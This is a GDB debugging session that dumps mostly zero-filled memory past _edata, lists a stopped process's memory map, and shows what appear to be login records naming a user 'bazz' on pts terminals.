0x240d0 <_edata+6422>: 0x00000000 0x00000000 0x00000000 0x00000000
0x240e0 <_edata+6438>: 0x00000000 0x00000000 0x00000000 0x00000000
0x240f0 <_edata+6454>: 0x00000000 0x00000000 0x00000000 0x00000000
0x24100 <_edata+6470>: 0x00000000 0x00000000 0x00000000 0x00000000
0x24110 <_edata+6486>: 0x00000000 0x00000000 0x00000000 0x00000000
0x24120 <_edata+6502>: 0x00000000 0x00000000 0x00000000 0x00000000
0x24130 <_edata+6518>: 0x00000000 0x00000000 0x00000000 0x00000000
0x24140 <_edata+6534>: 0x00000000 0x00000000 0x00000000 0x00000000
0x24150 <_edata+6550>: 0x00000000 0x00000000 0x00000000 0x00000000
0x24160 <_edata+6566>: 0x00000000 0x00000000 0x00000000 0x00000000
0x24170 <_edata+6582>: 0x00000000 0x00000000 0x00000000 0x00000000
0x24180 <_edata+6598>: 0x00000000 0x00000000 0x00000000 0x00000000
0x24190 <_edata+6614>: 0x00000000 0x00000000 0x00000000 0x00000000
0x241a0 <_edata+6630>: 0x00000000 0x00000000 0x00000000 0x00000000
0x241b0 <_edata+6646>: 0x00000000 0x00000000 0x00000000 0x00000000
0x241c0 <_edata+6662>: 0x00000000 0x00000000 0x00000000 0x00000000
0x241d0 <_edata+6678>: 0x00000000 0x00000000 0x00000000 0x00000000
0x241e0 <_edata+6694>: 0x00000000 0x00000000 0x00000000 0x00000000
0x241f0 <_edata+6710>: 0x00000000 0x00000000 0x00000000 0x00000000
(gdb)
0x24200 <_edata+6726>: 0x00000000 0x00000000 0x00000000 0x00000000
0x24210 <_edata+6742>: 0x00000000 0x00000000 0x00000000 0x00000000
0x24220 <_edata+6758>: 0x00000000 0x00000000 0x00000000 0x00000000
0x24230 <_edata+6774>: 0x00000000 0x00000000 0x00000000 0x00000000
0x24240 <_edata+6790>: 0x00000000 0x00000000 0x00000000 0x00000000
0x24250 <_edata+6806>: 0x00000000 0x00000000 0x00000000 0x00000000
0x24260 <_edata+6822>: 0x00000000 0x00000000 0x00000000 0x00000000
0x24270 <_edata+6838>: 0x00000000 0x00000000 0x00000000 0x00000000
0x24280 <_edata+6854>: 0x00000000 0x00000000 0x00000000 0x00000000
0x24290 <_edata+6870>: 0x00000000 0x00000000 0x00000000 0x00000000
0x242a0 <_edata+6886>: 0x00000000 0x00000000 0x00000000 0x00000000
0x242b0 <_edata+6902>: 0x00000000 0x00000000 0x00000000 0x00000000
0x242c0 <_edata+6918>: 0x00000000 0x00000000 0x00000000 0x00000000
0x242d0 <_edata+6934>: 0x00000000 0x00000000 0x00000000 0x00000000
0x242e0 <_edata+6950>: 0x00000000 0x00000000 0x00000000 0x00000000
0x242f0 <_edata+6966>: 0x00000000 0x00000000 0x00000000 0x00000000
0x24300 <_edata+6982>: 0x00000000 0x00000000 0x00000000 0x00000000
0x24310 <_edata+6998>: 0x00000000 0x00000000 0x00000000 0x00000000
0x24320 <_edata+7014>: 0x00000000 0x00000000 0x00000000 0x00000000
0x24330 <_edata+7030>: 0x00000000 0x00000000 0x00000000 0x00000000
0x24340 <_edata+7046>: 0x00000000 0x00000000 0x00000000 0x00000000
0x24350 <_edata+7062>: 0x00000000 0x00000000 0x00000000 0x00000000
0x24360 <_edata+7078>: 0x00000000 0x00000000 0x00000000 0x00000000
0x24370 <_edata+7094>: 0x00000000 0x00000000 0x00000000 0x00000000
(gdb)
0x24380 <_edata+7110>: 0x00000000 0x00000000 0x00000000 0x00000000
0x24390 <_edata+7126>: 0x00000000 0x00000000 0x00000000 0x00000000
0x243a0 <_edata+7142>: 0x00000000 0x00000000 0x00000000 0x00000000
0x243b0 <_edata+7158>: 0x00000000 0x00000000 0x00000000 0x00000000
0x243c0 <_edata+7174>: 0x00000000 0x00000000 0x00000000 0x00000000
0x243d0 <_edata+7190>: 0x00000000 0x00000000 0x00000000 0x00000000
0x243e0 <_edata+7206>: 0x00000000 0x00000000 0x00000000 0x00000000
0x243f0 <_edata+7222>: 0x00000000 0x00000000 0x00000000 0x00000000
0x24400 <_edata+7238>: 0x00000000 0x00000000 0x00000000 0x00000000
0x24410 <_edata+7254>: 0x00000000 0x00000000 0x00000000 0x00000000
0x24420 <_edata+7270>: 0x00000000 0x00000000 0x00000000 0x00000000
0x24430 <_edata+7286>: 0x00000000 0x00000000 0x00000000 0x00000000
0x24440 <_edata+7302>: 0x00000000 0x00000000 0x00000000 0x00000000
0x24450 <_edata+7318>: 0x00000000 0x00000000 0x00000000 0x00000000
0x24460 <_edata+7334>: 0x00000000 0x00000000 0x00000000 0x00000000
0x24470 <_edata+7350>: 0x00000000 0x00000000 0x00000000 0x00000000
0x24480 <_edata+7366>: 0x00000000 0x00000000 0x00000000 0x00000000
0x24490 <_edata+7382>: 0x00000000 0x00000000 0x00000000 0x00000000
0x244a0 <_edata+7398>: 0x00000000 0x00000000 0x00000000 0x00000000
0x244b0 <_edata+7414>: 0x00000000 0x00000000 0x00000000 0x00000000
0x244c0 <_edata+7430>: 0x00000000 0x00000000 0x00000000 0x00000000
0x244d0 <_edata+7446>: 0x00000000 0x00000000 0x00000000 0x00000000
0x244e0 <_edata+7462>: 0x00000000 0x00000000 0x00000000 0x00000000
0x244f0 <_edata+7478>: 0x00000000 0x00000000 0x00000000 0x00000000
(gdb)
0x24500 <_edata+7494>: 0x00000000 0x00000000 0x00000000 0x00000000
0x24510 <_edata+7510>: 0x00000000 0x00000000 0x00000000 0x00000000
0x24520 <_edata+7526>: 0x00000000 0x00000000 0x00000000 0x00000000
0x24530 <_edata+7542>: 0x00000000 0x00000000 0x00000000 0x00000000
0x24540 <_edata+7558>: 0x00000000 0x00000000 0x00000000 0x00000000
0x24550 <_edata+7574>: 0x00000000 0x00000000 0x00000000 0x00000000
0x24560 <_edata+7590>: 0x00000000 0x00000000 0x00000000 0x00000000
0x24570 <_edata+7606>: 0x00000000 0x00000000 0x00000000 0x00000000
0x24580 <_edata+7622>: 0x00000000 0x00000000 0x00000000 0x00000000
0x24590 <_edata+7638>: 0x00000000 0x00000000 0x00000000 0x00000000
0x245a0 <_edata+7654>: 0x00000000 0x00000000 0x00000000 0x00000000
0x245b0 <_edata+7670>: 0x00000000 0x00000000 0x00000000 0x00000000
0x245c0 <_edata+7686>: 0x00000000 0x00000000 0x00000000 0x00000000
0x245d0 <_edata+7702>: 0x00000000 0x00000000 0x00000000 0x00000000
0x245e0 <_edata+7718>: 0x00000000 0x00000000 0x00000000 0x00000000
0x245f0 <_edata+7734>: 0x00000000 0x00000000 0x00000000 0x00000000
0x24600 <_edata+7750>: 0x00000000 0x00000000 0x00000000 0x00000000
0x24610 <_edata+7766>: 0x00000000 0x00000000 0x00000000 0x00000000
0x24620 <_edata+7782>: 0x00000000 0x00000000 0x00000000 0x00000000
0x24630 <_edata+7798>: 0x00000000 0x00000000 0x00000000 0x00000000
0x24640 <_edata+7814>: 0x00000000 0x00000000 0x00000000 0x00000000
0x24650 <_edata+7830>: 0x00000000 0x00000000 0x00000000 0x00000000
0x24660 <_edata+7846>: 0x00000000 0x00000000 0x00000000 0x00000000
0x24670 <_edata+7862>: 0x00000000 0x00000000 0x00000000 0x00000000
(gdb)
0x24680 <_edata+7878>: 0x00000000 0x00000000 0x00000000 0x00000000
0x24690 <_edata+7894>: 0x00000000 0x00000000 0x00000000 0x00000000
0x246a0 <_edata+7910>: 0x00000000 0x00000000 0x00000000 0x00000000
0x246b0 <_edata+7926>: 0x00000000 0x00000000 0x00000000 0x00000000
0x246c0 <_edata+7942>: 0x00000000 0x00000000 0x00000000 0x00000000
0x246d0 <_edata+7958>: 0x00000000 0x00000000 0x00000000 0x00000000
0x246e0 <_edata+7974>: 0x00000000 0x00000000 0x00000000 0x00000000
0x246f0 <_edata+7990>: 0x00000000 0x00000000 0x00000000 0x00000000
0x24700 <_edata+8006>: 0x00000000 0x00000000 0x00000000 0x00000000
0x24710 <_edata+8022>: 0x00000000 0x00000000 0x00000000 0x00000000
0x24720 <_edata+8038>: 0x00000000 0x00000000 0x00000000 0x00000000
0x24730 <_edata+8054>: 0x00000000 0x00000000 0x00000000 0x00000000
0x24740 <_edata+8070>: 0x00000000 0x00000000 0x00000000 0x00000000
0x24750 <_edata+8086>: 0x00000000 0x00000000 0x00000000 0x00000000
0x24760 <_edata+8102>: 0x00000000 0x00000000 0x00000000 0x00000000
0x24770 <_edata+8118>: 0x00000000 0x00000000 0x00000000 0x00000000
0x24780 <_edata+8134>: 0x00000000 0x00000000 0x00000000 0x00000000
0x24790 <_edata+8150>: 0x00000000 0x00000000 0x00000000 0x00000000
0x247a0 <_edata+8166>: 0x00000000 0x00000000 0x00000000 0x00000000
0x247b0 <_edata+8182>: 0x00000000 0x00000000 0x00000000 0x00000000
0x247c0 <_edata+8198>: 0x00000000 0x00000000 0x00000000 0x00000000
0x247d0 <_edata+8214>: 0x00000000 0x00000000 0x00000000 0x00000000
0x247e0 <_edata+8230>: 0x00000000 0x00000000 0x00000000 0x00000000
0x247f0 <_edata+8246>: 0x00000000 0x00000000 0x00000000 0x00000000
(gdb)
0x24800 <_edata+8262>: 0x00000000 0x00000000 0x00000000 0x00000000
0x24810 <_edata+8278>: 0x00000000 0x00000000 0x00000000 0x00000000
0x24820 <_edata+8294>: 0x00000000 0x00000000 0x00000000 0x00000000
0x24830 <_edata+8310>: 0x00000000 0x00000000 0x00000000 0x00000000
0x24840 <_edata+8326>: 0x00000000 0x00000000 0x00000000 0x00000000
0x24850 <_edata+8342>: 0x00000000 0x00000000 0x00000000 0x00000000
0x24860 <_edata+8358>: 0x00000000 0x00000000 0x00000000 0x00000000
0x24870 <_edata+8374>: 0x00000000 0x00000000 0x00000000 0x00000000
0x24880 <_edata+8390>: 0x00000000 0x00000000 0x00000000 0x00000000
0x24890 <_edata+8406>: 0x00000000 0x00000000 0x00000000 0x00000000
0x248a0 <_edata+8422>: 0x00000000 0x00000000 0x00000000 0x00000000
0x248b0 <_edata+8438>: 0x00000000 0x00000000 0x00000000 0x00000000
0x248c0 <_edata+8454>: 0x00000000 0x00000000 0x00000000 0x00000000
0x248d0 <_edata+8470>: 0x00000000 0x00000000 0x00000000 0x00000000
0x248e0 <_edata+8486>: 0x00000000 0x00000000 0x00000000 0x00000000
0x248f0 <_edata+8502>: 0x00000000 0x00000000 0x00000000 0x00000000
0x24900 <_edata+8518>: 0x00000000 0x00000000 0x00000000 0x00000000
0x24910 <_edata+8534>: 0x00000000 0x00000000 0x00000000 0x00000000
0x24920 <_edata+8550>: 0x00000000 0x00000000 0x00000000 0x00000000
0x24930 <_edata+8566>: 0x00000000 0x00000000 0x00000000 0x00000000
0x24940 <_edata+8582>: 0x00000000 0x00000000 0x00000000 0x00000000
0x24950 <_edata+8598>: 0x00000000 0x00000000 0x00000000 0x00000000
0x24960 <_edata+8614>: 0x00000000 0x00000000 0x00000000 0x00000000
0x24970 <_edata+8630>: 0x00000000 0x00000000 0x00000000 0x00000000
(gdb)
0x24980 <_edata+8646>: 0x00000000 0x00000000 0x00000000 0x00000000
0x24990 <_edata+8662>: 0x00000000 0x00000000 0x00000000 0x00000000
0x249a0 <_edata+8678>: 0x00000000 0x00000000 0x00000000 0x00000000
0x249b0 <_edata+8694>: 0x00000000 0x00000000 0x00000000 0x00000000
0x249c0 <_edata+8710>: 0x00000000 0x00000000 0x00000000 0x00000000
0x249d0 <_edata+8726>: 0x00000000 0x00000000 0x00000000 0x00000000
0x249e0 <_edata+8742>: 0x00000000 0x00000000 0x00000000 0x00000000
0x249f0 <_edata+8758>: 0x00000000 0x00000000 0x00000000 0x00000000
0x24a00 <_edata+8774>: 0x00000000 0x00000000 0x00000000 0x00000000
0x24a10 <_edata+8790>: 0x00000000 0x00000000 0x00000000 0x00000000
0x24a20 <_edata+8806>: 0x00000000 0x00000000 0x00000000 0x00000000
0x24a30 <_edata+8822>: 0x00000000 0x00000000 0x00000000 0x00000000
0x24a40 <_edata+8838>: 0x00000000 0x00000000 0x00000000 0x00000000
0x24a50 <_edata+8854>: 0x00000000 0x00000000 0x00000000 0x00000000
0x24a60 <_edata+8870>: 0x00000000 0x00000000 0x00000000 0x00000000
0x24a70 <_edata+8886>: 0x00000000 0x00000000 0x00000000 0x00000000
0x24a80 <_edata+8902>: 0x00000000 0x00000000 0x00000000 0x00000000
0x24a90 <_edata+8918>: 0x00000000 0x00000000 0x00000000 0x00000000
0x24aa0 <_edata+8934>: 0x00000000 0x00000000 0x00000000 0x00000000
0x24ab0 <_edata+8950>: 0x00000000 0x00000000 0x00000000 0x00000000
0x24ac0 <_edata+8966>: 0x00000000 0x00000000 0x00000000 0x00000000
0x24ad0 <_edata+8982>: 0x00000000 0x00000000 0x00000000 0x00000000
0x24ae0 <_edata+8998>: 0x00000000 0x00000000 0x00000000 0x00000000
0x24af0 <_edata+9014>: 0x00000000 0x00000000 0x00000000 0x00000000
(gdb)
0x24b00 <_edata+9030>: 0x00000000 0x00000000 0x00000000 0x00000000
0x24b10 <_edata+9046>: 0x00000000 0x00000000 0x00000000 0x00000000
0x24b20 <_edata+9062>: 0x00000000 0x00000000 0x00000000 0x00000000
0x24b30 <_edata+9078>: 0x00000000 0x00000000 0x00000000 0x00000000
0x24b40 <_edata+9094>: 0x00000000 0x00000000 0x00000000 0x00000000
0x24b50 <_edata+9110>: 0x00000000 0x00000000 0x00000000 0x00000000
0x24b60 <_edata+9126>: 0x00000000 0x00000000 0x00000000 0x00000000
0x24b70 <_edata+9142>: 0x00000000 0x00000000 0x00000000 0x00000000
0x24b80 <_edata+9158>: 0x00000000 0x00000000 0x00000000 0x00000000
0x24b90 <_edata+9174>: 0x00000000 0x00000000 0x00000000 0x00000000
0x24ba0 <_edata+9190>: 0x00000000 0x00000000 0x00000000 0x00000000
0x24bb0 <_edata+9206>: 0x00000000 0x00000000 0x00000000 0x00000000
0x24bc0 <_edata+9222>: 0x00000000 0x00000000 0x00000000 0x00000000
0x24bd0 <_edata+9238>: 0x00000000 0x00000000 0x00000000 0x00000000
0x24be0 <_edata+9254>: 0x00000000 0x00000000 0x00000000 0x00000000
0x24bf0 <_edata+9270>: 0x00000000 0x00000000 0x00000000 0x00000000
0x24c00 <_edata+9286>: 0x00000000 0x00000000 0x00000000 0x00000000
0x24c10 <_edata+9302>: 0x00000000 0x00000000 0x00000000 0x00000000
0x24c20 <_edata+9318>: 0x00000000 0x00000000 0x00000000 0x00000000
0x24c30 <_edata+9334>: 0x00000000 0x00000000 0x00000000 0x00000000
0x24c40 <_edata+9350>: 0x00000000 0x00000000 0x00000000 0x00000000
0x24c50 <_edata+9366>: 0x00000000 0x00000000 0x00000000 0x00000000
0x24c60 <_edata+9382>: 0x00000000 0x00000000 0x00000000 0x00000000
0x24c70 <_edata+9398>: 0x00000000 0x00000000 0x00000000 0x00000000
(gdb)
0x24c80 <_edata+9414>: 0x00000000 0x00000000 0x00000000 0x00000000
0x24c90 <_edata+9430>: 0x00000000 0x00000000 0x00000000 0x00000000
0x24ca0 <_edata+9446>: 0x00000000 0x00000000 0x00000000 0x00000000
0x24cb0 <_edata+9462>: 0x00000000 0x00000000 0x00000000 0x00000000
0x24cc0 <_edata+9478>: 0x00000000 0x00000000 0x00000000 0x00000000
0x24cd0 <_edata+9494>: 0x00000000 0x00000000 0x00000000 0x00000000
0x24ce0 <_edata+9510>: 0x00000000 0x00000000 0x00000000 0x00000000
0x24cf0 <_edata+9526>: 0x00000000 0x00000000 0x00000000 0x00000000
0x24d00 <_edata+9542>: 0x00000000 0x00000000 0x00000000 0x00000000
0x24d10 <_edata+9558>: 0x00000000 0x00000000 0x00000000 0x00000000
0x24d20 <_edata+9574>: 0x00000000 0x00000000 0x00000000 0x00000000
0x24d30 <_edata+9590>: 0x00000000 0x00000000 0x00000000 0x00000000
0x24d40 <_edata+9606>: 0x00000000 0x00000000 0x00000000 0x00000000
0x24d50 <_edata+9622>: 0x00000000 0x00000000 0x00000000 0x00000000
0x24d60 <_edata+9638>: 0x00000000 0x00000000 0x00000000 0x00000000
0x24d70 <_edata+9654>: 0x00000000 0x00000000 0x00000000 0x00000000
0x24d80 <_edata+9670>: 0x00000000 0x00000000 0x00000000 0x00000000
0x24d90 <_edata+9686>: 0x00000000 0x00000000 0x00000000 0x00000000
0x24da0 <_edata+9702>: 0x00000000 0x00000000 0x00000000 0x00000000
0x24db0 <_edata+9718>: 0x00000000 0x00000000 0x00000000 0x00000000
0x24dc0 <_edata+9734>: 0x00000000 0x00000000 0x00000000 0x00000000
0x24dd0 <_edata+9750>: 0x00000000 0x00000000 0x00000000 0x00000000
0x24de0 <_edata+9766>: 0x00000000 0x00000000 0x00000000 0x00000000
0x24df0 <_edata+9782>: 0x00000000 0x00000000 0x00000000 0x00000000
(gdb)
0x24e00 <_edata+9798>: 0x00000000 0x00000000 0x00000000 0x00000000
0x24e10 <_edata+9814>: 0x00000000 0x00000000 0x00000000 0x00000000
0x24e20 <_edata+9830>: 0x00000000 0x00000000 0x00000000 0x00000000
0x24e30 <_edata+9846>: 0x00000000 0x00000000 0x00000000 0x00000000
0x24e40 <_edata+9862>: 0x00000000 0x00000000 0x00000000 0x00000000
0x24e50 <_edata+9878>: 0x00000000 0x00000000 0x00000000 0x00000000
0x24e60 <_edata+9894>: 0x00000000 0x00000000 0x00000000 0x00000000
0x24e70 <_edata+9910>: 0x00000000 0x00000000 0x00000000 0x00000000
0x24e80 <_edata+9926>: 0x00000000 0x00000000 0x00000000 0x00000000
0x24e90 <_edata+9942>: 0x00000000 0x00000000 0x00000000 0x00000000
0x24ea0 <_edata+9958>: 0x00000000 0x00000000 0x00000000 0x00000000
0x24eb0 <_edata+9974>: 0x00000000 0x00000000 0x00000000 0x00000000
0x24ec0 <_edata+9990>: 0x00000000 0x00000000 0x00000000 0x00000000
0x24ed0 <_edata+10006>: 0x00000000 0x00000000 0x00000000 0x00000000
0x24ee0 <_edata+10022>: 0x00000000 0x00000000 0x00000000 0x00000000
0x24ef0 <_edata+10038>: 0x00000000 0x00000000 0x00000000 0x00000000
0x24f00 <_edata+10054>: 0x00000000 0x00000000 0x00000000 0x00000000
0x24f10 <_edata+10070>: 0x00000000 0x00000000 0x00000000 0x00000000
0x24f20 <_edata+10086>: 0x00000000 0x00000000 0x00000000 0x00000000
0x24f30 <_edata+10102>: 0x00000000 0x00000000 0x00000000 0x00000000
0x24f40 <_edata+10118>: 0x00000000 0x00000000 0x00000000 0x00000000
0x24f50 <_edata+10134>: 0x00000000 0x00000000 0x00000000 0x00000000
0x24f60 <_edata+10150>: 0x00000000 0x00000000 0x00000000 0x00000000
0x24f70 <_edata+10166>: 0x00000000 0x00000000 0x00000000 0x00000000
(gdb)
0x24f80 <_edata+10182>: 0x00000000 0x00000000 0x00000000 0x00000000
0x24f90 <_edata+10198>: 0x00000000 0x00000000 0x00000000 0x00000000
0x24fa0 <_edata+10214>: 0x00000000 0x00000000 0x00000000 0x00000000
0x24fb0 <_edata+10230>: 0x00000000 0x00000000 0x00000000 0x00000000
0x24fc0 <_edata+10246>: 0x00000000 0x00000000 0x00000000 0x00000000
0x24fd0 <_edata+10262>: 0x00000000 0x00000000 0x00000000 0x00000000
0x24fe0 <_edata+10278>: 0x00000000 0x00000000 0x00000000 0x00000000
0x24ff0 <_edata+10294>: 0x00000000 0x00000000 0x00000000 0x00000000
0x25000 <_edata+10310>: 0x00000000 0x00000000 0x00000000 0x00000000
0x25010 <_edata+10326>: 0x00000000 0x00000000 0x00000000 0x00000000
0x25020 <_edata+10342>: 0x00000000 0x00000000 0x00000000 0x00000000
0x25030 <_edata+10358>: 0x00000000 0x00000000 0x00000000 0x00000000
0x25040 <_edata+10374>: 0x00000000 0x00000000 0x00000000 0x00000000
0x25050 <_edata+10390>: 0x00000000 0x00000000 0x00000000 0x00000000
0x25060 <_edata+10406>: 0x00000000 0x00000000 0x00000000 0x00000000
0x25070 <_edata+10422>: 0x00000000 0x00000000 0x00000000 0x00000000
0x25080 <_edata+10438>: 0x00000000 0x00000000 0x00000000 0x00000000
0x25090 <_edata+10454>: 0x00000000 0x00000000 0x00000000 0x00000000
0x250a0 <_edata+10470>: 0x00000000 0x00000000 0x00000000 0x00000000
0x250b0 <_edata+10486>: 0x00000000 0x00000000 0x00000000 0x00000000
0x250c0 <_edata+10502>: 0x00000000 0x00000000 0x00000000 0x00000000
0x250d0 <_edata+10518>: 0x00000000 0x00000000 0x00000000 0x00000000
0x250e0 <_edata+10534>: 0x00000000 0x00000000 0x00000000 0x00000000
0x250f0 <_edata+10550>: 0x00000000 0x00000000 0x00000000 0x00000000
(gdb) info proc map
process 1086 flags:
PR_STOPPED Process (LWP) is stopped
PR_ISTOP Stopped on an event of interest
PR_RLC Run-on-last-close is in effect
PR_FAULTED : Incurred a traced hardware fault FLTBPT: Breakpoint trap
Mapped address spaces:
Start Addr End Addr Size Offset Flags
0x10000 0x13fff 0x4000 0 ----r-x
0x22000 0x23fff 0x2000 0x2000 ----rwx
0x24000 0x35fff 0x12000 0 --b-rwx
0xff280000 0xff32bfff 0xac000 0 ----r-x
0xff33c000 0xff343fff 0x8000 0xac000 ----rwx
0xff370000 0xff371fff 0x2000 0 ----rwx
0xff380000 0xff383fff 0x4000 0 ----r-x
0xff390000 0xff391fff 0x2000 0 ----rwx
0xff3b0000 0xff3dffff 0x30000 0 ----r-x
0xff3e0000 0xff3e1fff 0x2000 0x30000 ----rwx
0xff3e2000 0xff3e3fff 0x2000 0 ----rwx
0xffbee000 0xffbeffff 0x2000 0 -s--rwx
(gdb) x/96x 0x34000
0x34000: 0x00000000 0x00000000 0x00000000 0x00000000
0x34010: 0x00000000 0x00000000 0x00000000 0x00000000
0x34020: 0x00000000 0x00000000 0x62617a7a 0x00000000
0x34030: 0x00000000 0x00000000 0x00000000 0x00000000
0x34040: 0x00000000 0x00000000 0x74732f35 0x7074732f
0x34050: 0x35000000 0x00000000 0x00000000 0x00000000
0x34060: 0x00000000 0x00000000 0x00000000 0x00007467
0x34070: 0x00080000 0x00000000 0x544b6439 0x0001fa71
0x34080: 0x00000000 0x00000000 0x00000000 0x00000000
0x34090: 0x00000000 0x00000000 0x00000000 0x00000000
0x340a0: 0x00000000 0x00000000 0x00000000 0x00000000
0x340b0: 0x00000000 0x00000000 0x00000000 0x00000000
0x340c0: 0x00000000 0x00000000 0x00000000 0x00000000
0x340d0: 0x00000000 0x00000000 0x00000000 0x00000000
0x340e0: 0x00000000 0x00000000 0x00000000 0x00000000
0x340f0: 0x00000000 0x00000000 0x00000000 0x00000000
0x34100: 0x00000000 0x00000000 0x00000000 0x00000000
0x34110: 0x00000000 0x00000000 0x00000000 0x00000000
0x34120: 0x00000000 0x00000000 0x00000000 0x00000000
0x34130: 0x00000000 0x00000000 0x00000000 0x00000000
0x34140: 0x00000000 0x00000000 0x00000000 0x00000000
0x34150: 0x00000000 0x00000000 0x00000000 0x00000000
0x34160: 0x00000000 0x00000000 0x00000000 0x00000000
0x34170: 0x00000000 0x00000000 0x00000000 0x00000000
(gdb)
0x34180: 0x00000000 0x00000000 0x00000000 0x00000000
0x34190: 0x00000000 0x00000000 0x0000002f 0x62617a7a
0x341a0: 0x00000000 0x00000000 0x00000000 0x00000000
0x341b0: 0x00000000 0x00000000 0x00000000 0x74732f36
0x341c0: 0x7074732f 0x36000000 0x00000000 0x00000000
0x341d0: 0x00000000 0x00000000 0x00000000 0x00000000
0x341e0: 0x00007497 0x00080000 0x00000000 0x544b6438
0x341f0: 0x000e757d 0x00000000 0x00000000 0x00000000
0x34200: 0x00000000 0x00000000 0x00000000 0x00000000
0x34210: 0x00000000 0x00000000 0x00000000 0x00000000
0x34220: 0x00000000 0x00000000 0x00000000 0x00000000
0x34230: 0x00000000 0x00000000 0x00000000 0x00000000
0x34240: 0x00000000 0x00000000 0x00000000 0x00000000
0x34250: 0x00000000 0x00000000 0x00000000 0x00000000
0x34260: 0x00000000 0x00000000 0x00000000 0x00000000
0x34270: 0x00000000 0x00000000 0x00000000 0x00000000
0x34280: 0x00000000 0x00000000 0x00000000 0x00000000
0x34290: 0x00000000 0x00000000 0x00000000 0x00000000
0x342a0: 0x00000000 0x00000000 0x00000000 0x00000000
0x342b0: 0x00000000 0x00000000 0x00000000 0x00000000
0x342c0: 0x00000000 0x00000000 0x00000000 0x00000000
0x342d0: 0x00000000 0x00000000 0x00000000 0x00000000
0x342e0: 0x00000000 0x00000000 0x00000000 0x00000000
0x342f0: 0x00000000 0x00000000 0x00000000 0x00000000
(gdb)
0x34300: 0x00000000 0x00000000 0x00000000 0x0000002f
0x34310: 0x62617a7a 0x00000000 0x00000000 0x00000000
0x34320: 0x00000000 0x00000000 0x00000000 0x00000000
0x34330: 0x74732f37 0x7074732f 0x37000000 0x00000000
0x34340: 0x00000000 0x00000000 0x00000000 0x00000000
0x34350: 0x00000000 0x000074a9 0x00080000 0x00000000
0x34360: 0x544b6438 0x000ba288 0x00000000 0x00000000
0x34370: 0x00000000 0x00000000 0x00000000 0x00000000
0x34380: 0x00000000 0x00000000 0x00000000 0x00000000
0x34390: 0x00000000 0x00000000 0x00000000 0x00000000
0x343a0: 0x00000000 0x00000000 0x00000000 0x00000000
0x343b0: 0x00000000 0x00000000 0x00000000 0x00000000
0x343c0: 0x00000000 0x00000000 0x00000000 0x00000000
0x343d0: 0x00000000 0x00000000 0x00000000 0x00000000
0x343e0: 0x00000000 0x00000000 0x00000000 0x00000000
0x343f0: 0x00000000 0x00000000 0x00000000 0x00000000
0x34400: 0x00000000 0x00000000 0x00000000 0x00000000
0x34410: 0x00000000 0x00000000 0x00000000 0x00000000
0x34420: 0x00000000 0x00000000 0x00000000 0x00000000
0x34430: 0x00000000 0x00000000 0x00000000 0x00000000
0x34440: 0x00000000 0x00000000 0x00000000 0x00000000
0x34450: 0x00000000 0x00000000 0x00000000 0x00000000
0x34460: 0x00000000 0x00000000 0x00000000 0x00000000
0x34470: 0x00000000 0x00000000 0x00000000 0x00000000
(gdb)
0x34480: 0x0000002f 0x62617a7a 0x00000000 0x00000000
0x34490: 0x00000000 0x00000000 0x00000000 0x00000000
0x344a0: 0x00000000 0x74732f38 0x7074732f 0x38000000
0x344b0: 0x00000000 0x00000000 0x00000000 0x00000000
0x344c0: 0x00000000 0x00000000 0x000074d9 0x00080000
0x344d0: 0x00000000 0x544b6438 0x0008c36e 0x00000000
0x344e0: 0x00000000 0x00000000 0x00000000 0x00000000
0x344f0: 0x00000000 0x00000000 0x00000000 0x00000000
0x34500: 0x00000000 0x00000000 0x00000000 0x00000000
0x34510: 0x00000000 0x00000000 0x00000000 0x00000000
0x34520: 0x00000000 0x00000000 0x00000000 0x00000000
0x34530: 0x00000000 0x00000000 0x00000000 0x00000000
0x34540: 0x00000000 0x00000000 0x00000000 0x00000000
0x34550: 0x00000000 0x00000000 0x00000000 0x00000000
0x34560: 0x00000000 0x00000000 0x00000000 0x00000000
0x34570: 0x00000000 0x00000000 0x00000000 0x00000000
0x34580: 0x00000000 0x00000000 0x00000000 0x00000000
0x34590: 0x00000000 0x00000000 0x00000000 0x00000000
0x345a0: 0x00000000 0x00000000 0x00000000 0x00000000
0x345b0: 0x00000000 0x00000000 0x00000000 0x00000000
0x345c0: 0x00000000 0x00000000 0x00000000 0x00000000
0x345d0: 0x00000000 0x00000000 0x00000000 0x00000000
0x345e0: 0x00000000 0x00000000 0x00000000 0x00000000
0x345f0: 0x00000000 0x0000002f 0x62617a7a 0x00000000
(gdb)
0x34600: 0x00000000 0x00000000 0x00000000 0x00000000
0x34610: 0x00000000 0x00000000 0x74732f39 0x7074732f
0x34620: 0x39000000 0x00000000 0x00000000 0x00000000
0x34630: 0x00000000 0x00000000 0x00000000 0x000074f3
0x34640: 0x00080000 0x00000000 0x544b6438 0x0002c7ad
0x34650: 0x00000000 0x00000000 0x00000000 0x00000000
0x34660: 0x00000000 0x00000000 0x00000000 0x00000000
0x34670: 0x00000000 0x00000000 0x00000000 0x00000000
0x34680: 0x00000000 0x00000000 0x00000000 0x00000000
0x34690: 0x00000000 0x00000000 0x00000000 0x00000000
0x346a0: 0x00000000 0x00000000 0x00000000 0x00000000
0x346b0: 0x00000000 0x00000000 0x00000000 0x00000000
0x346c0: 0x00000000 0x00000000 0x00000000 0x00000000
0x346d0: 0x00000000 0x00000000 0x00000000 0x00000000
0x346e0: 0x00000000 0x00000000 0x00000000 0x00000000
0x346f0: 0x00000000 0x00000000 0x00000000 0x00000000
0x34700: 0x00000000 0x00000000 0x00000000 0x00000000
0x34710: 0x00000000 0x00000000 0x00000000 0x00000000
0x34720: 0x00000000 0x00000000 0x00000000 0x00000000
0x34730: 0x00000000 0x00000000 0x00000000 0x00000000
0x34740: 0x00000000 0x00000000 0x00000000 0x00000000
0x34750: 0x00000000 0x00000000 0x00000000 0x00000000
0x34760: 0x00000000 0x00000000 0x0000002f 0x62617a7a
0x34770: 0x00000000 0x00000000 0x00000000 0x00000000
(gdb)
0x34780: 0x00000000 0x00000000 0x00000000 0x732f3130
0x34790: 0x7074732f 0x31300000 0x00000000 0x00000000
0x347a0: 0x00000000 0x00000000 0x00000000 0x00000000
0x347b0: 0x00007501 0x00080000 0x00000000 0x544b6437
0x347c0: 0x000cbf95 0x00000000 0x00000000 0x00000000
0x347d0: 0x00000000 0x00000000 0x00000000 0x00000000
0x347e0: 0x00000000 0x00000000 0x00000000 0x00000000
0x347f0: 0x00000000 0x00000000 0x00000000 0x00000000
0x34800: 0x00000000 0x00000000 0x00000000 0x00000000
0x34810: 0x00000000 0x00000000 0x00000000 0x00000000
0x34820: 0x00000000 0x00000000 0x00000000 0x00000000
0x34830: 0x00000000 0x00000000 0x00000000 0x00000000
0x34840: 0x00000000 0x00000000 0x00000000 0x00000000
0x34850: 0x00000000 0x00000000 0x00000000 0x00000000
